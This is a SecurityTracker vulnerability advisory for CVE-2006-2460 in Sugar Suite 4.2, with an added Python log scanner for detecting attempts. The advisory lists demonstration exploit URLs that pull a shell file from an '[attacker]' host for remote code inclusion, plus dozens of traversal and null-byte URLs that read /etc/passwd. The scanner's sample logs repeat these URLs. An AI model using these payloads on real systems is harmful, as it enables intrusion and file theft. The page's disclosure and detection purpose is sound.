SecurityTracker.com
Category: Application (Forum/Board/Portal) > Sugar Suite
Vendors: SugarCRM Inc.
Sugar Suite 'sugarEntry' Globals Entry Lets Remote Users Include and Execute Arbitrary Code
SecurityTracker Alert ID: 1016087
SecurityTracker URL: http://securitytracker.com/id/1016087
CVE Reference: CVE-2006-2460
Updated: Dec 5 2009
Original Entry Date: May 15 2006
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 4.2
Description:   rgod reported a vulnerability in Sugar Suite. A remote user can include and execute arbitrary code on the target system.

The 'modules/OptimisticLock/LockResolve.php' script does not properly validate user-supplied input. When register_globals is enabled, request parameters become PHP globals, so the demonstration URLs set 'GLOBALS[sugarEntry]=1' to satisfy the script's entry-point check and supply the path of the class file to be included in 'beanFiles[1]'. If allow_url_fopen is also enabled, that path can be a URL, and the target system will fetch and execute arbitrary PHP code from the remote location. The PHP code, including any operating system commands it invokes, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://[attacker]/someshell.txt

http://[target]/[path]/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://username:password@[attacker]/shell.txt

A remote user can also include arbitrary files located on the target system (and execute any PHP code they contain) through the 'theme' parameter of a number of scripts, again setting 'GLOBALS[sugarEntry]' to pass the entry-point check. The directory traversal sequence and the trailing '%00' (null byte) in the demonstration URLs truncate the path that the script appends to the theme name; this requires magic_quotes_gpc to be disabled, since it would otherwise escape the null byte. The following scripts are affected:

http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Contacts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Dashboard/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Documents/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Dropdown/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Dropdown/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/DynamicFields/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EditCustomFields/EditView.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EditCustomFields/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EmailMan/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Emails/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EmailTemplates/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Feeds/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Home/PopupSugar.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Leads/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/MailMerge/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Meetings/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Notes/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Opportunities/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Project/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Project/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/ProjectTask/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/ProspectLists/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Prospects/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Roles/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Tasks/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Users/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00

The original advisory is available at:

http://retrogod.altervista.org/sugar_suite_42_incl_xpl.html
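
The two request shapes described above (remote inclusion via 'beanFiles[...]' and local inclusion via 'theme' with traversal and '%00') share one precondition, the 'GLOBALS[sugarEntry]' override, which makes them easy to pick out of web-server logs after the fact. The following scanner is an added example and is not code from SecurityTracker, rgod or SugarCRM. Its access-log lines, the '/sugar/' install path, the 203.0.113.x/192.0.2.x addresses (documentation ranges) and the indicator names are all constructed for the example; the regexes key only on the patterns visible in the demonstration URLs on this page.

```python
"""Scan web-server access logs for the request patterns shown in this
advisory (CVE-2006-2460): GLOBALS[...] keys injected via register_globals,
beanFiles[...] values that carry a URL scheme (remote inclusion), and
theme values that use ../ traversal with a %00 terminator (local inclusion).

Added example; not code from SecurityTracker, rgod or SugarCRM. The log
lines, the IP addresses (RFC 5737 documentation ranges) and the '/sugar/'
install path are all constructed for the example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Common Log Format lines modelled on the advisory's demo URLs;
# the fourth is benign traffic, to show the scanner does not flag it.
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2006:04:21:56 +0200] "GET /sugar/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://203.0.113.9/someshell.txt HTTP/1.0" 200 512
10.0.0.5 - - [15/May/2006:04:22:03 +0200] "GET /sugar/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://user:pw@203.0.113.9/shell.txt HTTP/1.0" 200 2048
10.0.0.7 - - [15/May/2006:04:23:10 +0200] "GET /sugar/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../etc/passwd%00 HTTP/1.0" 200 1337
192.0.2.4 - - [15/May/2006:04:24:00 +0200] "GET /sugar/index.php?module=Accounts&action=index&theme=Sugar HTTP/1.1" 200 9000
"""

# ip, ident, user, [timestamp], "METHOD url PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)'
)
# Any URL scheme ("http://", "ftp://", "php://", ...) at the start of a value.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# PHP superglobals that register_globals lets a request overwrite.
SUPERGLOBALS = {"GLOBALS", "_SESSION", "_SERVER", "_COOKIE", "_GET", "_POST",
                "_REQUEST", "_FILES", "_ENV"}
# Request parameters the advisory shows being used as include paths.
INCLUDE_PARAMS = {"beanFiles"}


def classify_query(query):
    """Return the set of indicator names present in a raw query string.

    parse_qsl percent-decodes values, so '%00' arrives as a real NUL byte
    and '%2e%2e/' as '../', which is what the PHP side would see as well.
    """
    hits = set()
    for key, value in parse_qsl(query, keep_blank_values=True):
        base = key.split("[", 1)[0]          # 'GLOBALS[sugarEntry]' -> 'GLOBALS'
        if "[" in key and base in SUPERGLOBALS:
            hits.add("superglobal_override")
        if base in INCLUDE_PARAMS and SCHEME_RE.match(value):
            hits.add("remote_include")
        if "../" in value or "..\\" in value:
            hits.add("path_traversal")
        if "\x00" in value:
            hits.add("null_byte")
    return hits


def scan_log(text):
    """Return a list of (client ip, script path, sorted indicators) per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # not CLF; skip rather than guess
        parts = urlsplit(m["url"])
        hits = classify_query(parts.query)
        if hits:
            findings.append((m["ip"], parts.path, sorted(hits)))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {','.join(hits)}")
```

Run stand-alone it prints the three exploit requests and stays silent on the benign one. The 'superglobal_override' indicator is the one worth alerting on by itself, since every URL on this page depends on it and no legitimate client sends 'GLOBALS[' in a query string; the scanner is a detection aid, not a fix, and the fix on the affected host is to turn off register_globals (and allow_url_fopen where it is not needed) until a patched version is available.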

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution: No solution was available at the time of this entry.
Vendor URL: www.sugarcrm.com/crm/
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 15 May 2006 04:21:56 +0200
Subject:  Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit

http://retrogod.altervista.org/sugar_suite_42_incl_xpl.html

rgod
Copyright 2014, SecurityGlobal.net LLC